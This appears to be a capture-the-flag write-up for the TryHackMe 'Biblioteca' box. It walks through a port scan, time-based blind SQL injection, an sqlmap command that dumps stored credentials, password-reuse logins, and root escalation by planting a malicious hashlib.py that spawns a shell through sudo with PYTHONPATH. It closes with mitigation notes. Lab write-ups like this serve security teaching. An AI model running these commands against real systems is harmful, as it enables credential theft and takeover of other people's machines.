
THM Biblioteca - Writeup

Challenge Info


Description

This medium-difficulty box involves basic enumeration, blind SQL injection, password reuse exploitation, and Python library hijacking for privilege escalation.


Enumeration

Port Scanning

nmap -p- 10.201.1.150

Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu
8000/tcp open  http    Werkzeug httpd 2.0.2 (Python 3.8.10)

Web Application Analysis

Port 8000 hosts a login and registration page:

[Screenshot: Login page]


Initial Foothold

Registration

Register a test user to access the authenticated area:

[Screenshot: Registration form]

The authenticated page offers limited functionality.

Blind SQL Injection

Test the login form for SQL injection using time-based techniques:

[Screenshot: SQLi test request]

In Burp Suite, add a payload processing rule that replaces the __TIME__ placeholder in each payload with a 10 second delay:

[Screenshot: Payload processing rule]

Blind SQLi confirmed: the response is delayed by 10 seconds, matching the injected sleep:

[Screenshot: Blind SQLi confirmed]

Database Enumeration

Use sqlmap against the login form to enumerate the database (listing its tables first) and extract the stored credentials:

sqlmap -u "http://10.201.1.150:8000/login" \
  --data="email=test@test.com&password=test" \
  --batch \
  --tables

[Screenshot: sqlmap output]

Extracted credentials:

smokey@email.boop | <REDACTED> | smokey

SSH Access

Connect via SSH with the recovered credentials:

[Screenshot: SSH access]

Four user accounts work with variations of the same password. The user flag is located in hazel’s home directory.


Privilege Escalation

Password Discovery

After extensive enumeration, the simplest solution works: the password is the same as the username:

hazel:hazel

This pattern exists in many password wordlists, making it discoverable through brute force.

[Screenshot: Access as hazel]

Sudo Rights

Check sudo permissions:

sudo -l

User hazel can run a Python script as root:

(ALL) SETENV: /usr/bin/python3 /home/hazel/hasher.py

Python Library Hijacking

The hasher.py script imports the hashlib module. Because the sudo rule carries the SETENV tag, hazel may set environment variables for that command, so PYTHONPATH survives sudo's usual environment reset. Python searches PYTHONPATH entries before the standard library, so a file named hashlib.py in such a directory is imported in place of the real module and runs as root.

Reference: Python Library Hijacking on Linux

Create a malicious hashlib.py in /tmp/:

import os
os.system("/bin/bash")

Execute the privilege escalation:

sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/hazel/hasher.py

[Screenshot: Library hijacking]

Root access obtained:

[Screenshot: Root flag and root access]
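To make the mechanism behind the SETENV rule concrete, here is an added example (not code from the box or the original post) that resolves a module name the way the interpreter does for a given PYTHONPATH and flags a standard-library name that would be served from somewhere else. The shadow hashlib.py it writes to a temporary directory is a harmless placeholder, and the function names are my own.

```python
import importlib.machinery
import os
import sysconfig
import tempfile

# Directory holding the real standard library for this interpreter.
STDLIB = sysconfig.get_paths()["stdlib"]


def resolve_module(name, pythonpath=""):
    """Return the file that `import name` would load, or None.

    Mirrors the interpreter's own order: PYTHONPATH entries are searched
    before the standard library, which is exactly what the SETENV sudo
    rule lets a user exploit. Empty PYTHONPATH entries are ignored.
    """
    search = [p for p in pythonpath.split(os.pathsep) if p] + [STDLIB]
    spec = importlib.machinery.PathFinder.find_spec(name, search)
    return spec.origin if spec else None


def is_shadowed(name, pythonpath=""):
    """True if `name` would be loaded from outside the standard library."""
    origin = resolve_module(name, pythonpath)
    return origin is not None and not origin.startswith(STDLIB + os.sep)


def demo():
    """Constructed scenario: a benign hashlib.py dropped into a temp dir."""
    with tempfile.TemporaryDirectory() as shadow_dir:
        fake = os.path.join(shadow_dir, "hashlib.py")
        with open(fake, "w") as fh:
            fh.write("# placeholder shadow module, not the real hashlib\n")
        return {
            # Without PYTHONPATH, hashlib comes from the stdlib.
            "clean": is_shadowed("hashlib"),
            # With the temp dir on PYTHONPATH, the placeholder wins.
            "hijacked": is_shadowed("hashlib", shadow_dir),
            "hijacked_origin": os.path.samefile(
                resolve_module("hashlib", shadow_dir), fake
            ),
        }


if __name__ == "__main__":
    print(demo())
```

Running the script with python3 -I (isolated mode) makes the interpreter ignore PYTHONPATH, and dropping the SETENV tag from the sudoers entry restores sudo's default environment reset, so either change closes this path.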


Lessons Learned

  • Blind SQL injection can be time-based and detected through response delays
  • SQLMap automates database extraction from SQL injection vulnerabilities
  • Always test password reuse (username as password) before complex attacks
  • The SETENV sudo tag allows PYTHONPATH manipulation for library hijacking
  • Python library hijacking requires writable directories and specific sudo permissions
  • Enumerate thoroughly but don’t overlook simple solutions

Tools Used

  • Nmap - Port scanning
  • Burp Suite - SQL injection testing
  • SQLMap - Automated SQL injection exploitation
  • SSH - Remote access

This post is licensed under CC BY 4.0 by the author.